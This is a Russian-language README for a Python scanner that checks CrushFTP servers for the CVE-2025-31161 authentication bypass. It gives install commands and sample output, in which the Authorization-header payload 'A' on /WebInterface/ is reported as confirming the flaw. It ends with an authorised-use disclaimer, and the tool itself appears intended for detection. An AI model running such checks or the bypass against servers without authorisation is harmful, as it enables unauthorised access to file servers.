
Сканирует цель, чтобы проверить, уязвима ли она для CVE-2025-31161
Инструмент на Python для обнаружения и проверки уязвимости CVE-2025-31161 на серверах CrushFTP.
Этот скрипт проверяет уязвимость обхода аутентификации (CVE-2025-31161) на серверах CrushFTP, которая позволяет удалённым злоумышленникам проходить аутентификацию без действующих учётных данных путём манипуляции HTTP-заголовком Authorization.
python3 CVE-2025-31161.py
git clone https://github.com/yourusername/CVE-2025-31161.py
cd CVE-2025-31161.py
pip3 install -r requirements.txt
$ python3 CVE-2025-31161.py
Введите IP-адрес цели: 192.168.1.100
Введите порт цели [8080]: 8080
==================================================
📡 Проверка: /WebInterface/
🔑 Пейлоад: 'A'
📊 Статус: 200
🎉 УЯЗВИМОСТЬ ПОДТВЕРЖДЕНА
💡 200 OK с содержимым: dashboard, main
✅ Рабочий пейлоад: 'A'
==================================================
🎯 Цель: 192.168.1.100:8080
🔴 СТАТУС УЯЗВИМОСТИ: УЯЗВИМ
💥 Обход аутентификации CVE-2025-31161 ПОДТВЕРЖДЁН
✅ Рабочие пейлоады:
==================================================
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования. Используйте его только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.